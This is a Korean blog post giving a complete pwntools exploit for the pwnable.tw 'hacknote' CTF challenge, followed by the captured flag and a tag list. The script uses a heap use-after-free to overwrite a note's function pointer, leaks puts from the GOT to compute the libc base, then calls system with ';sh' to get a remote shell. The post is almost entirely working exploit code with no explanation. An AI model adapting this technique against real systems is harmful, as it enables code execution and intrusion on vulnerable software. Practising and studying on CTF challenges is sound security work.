티스토리 뷰
from pwn import *
s = remote("chall.pwnable.tw", 10102)
e = ELF("./hacknote")
lib = ELF("./libc_32.so.6")
#context.log_level = 'debug'
leakfunc =0x804862B
s.recvuntil(":")
s.sendline('1')
s.recvuntil(":")
s.sendline("1000")
s.recvuntil(":")
s.sendline("hyomin")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("1000")
s.recvuntil(":")
s.sendline("hyomin2")
s.recvuntil(":")
s.sendline("2")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("2")
s.recvuntil(":")
s.sendline("0")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("8")
s.recvuntil(":")
s.sendline(p32(leakfunc)+p32(e.got['puts']))
#s.sendline(p32(e.got['puts'])+"Hel")
s.recvuntil(":")
s.sendline("3")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
libc =hex(u32(s.recv()[:4]))
base = int(libc,16) - int(lib.symbols['puts'])
print("base :"+hex(base))
system = base + lib.symbols['system']
print("system :"+hex(system))
sleep(0.5)
s.sendline("2")
s.recvuntil(":")
s.sendline("2")
s.recvuntil(":")
s.sendline("1")
s.recvuntil(":")
s.sendline("8")
s.recvuntil(":")
s.sendline(p32(system)+";sh;sh")
#s.sendline(p32(leakfunc)+p32(e.got['printf']))
s.recvuntil(":")
s.sendline("3")
s.recvuntil(":")
s.sendline("1")
s.recvuntil("Index :")
s.interactive()
FLAG{Us3_aft3r_fl3333_in_h4ck_not3}
'pwnable > pwnable.tw' 카테고리의 다른 글
| [pwnpwnpwn-5] pwnable.tw tcache_tear (0) | 2020.01.12 |
|---|---|
| [pwnpwnpwn-1] pwnable.tw seethefile (0) | 2019.12.22 |
| [pwnable.tw] silver_bullet write-up (0) | 2018.09.29 |
| [pwnable.tw] start write-up (0) | 2018.09.29 |
| [pwnable.tw] orw write-up (0) | 2018.08.19 |
- SQLi
- fsop
- exit
- HackCTF
- srop
- shellcoding
- oob
- fastbindup
- pwnable.tw
- 해킹
- stack reusing
- FSB
- pwnable
- heap
- tcache
- ebp change
- rt_sigreturn
- fastbin
- overflow
- TLS
- 본선가고싶다
- pwable
- hacking
- glibc
- codegate
- Total
- Today
- Yesterday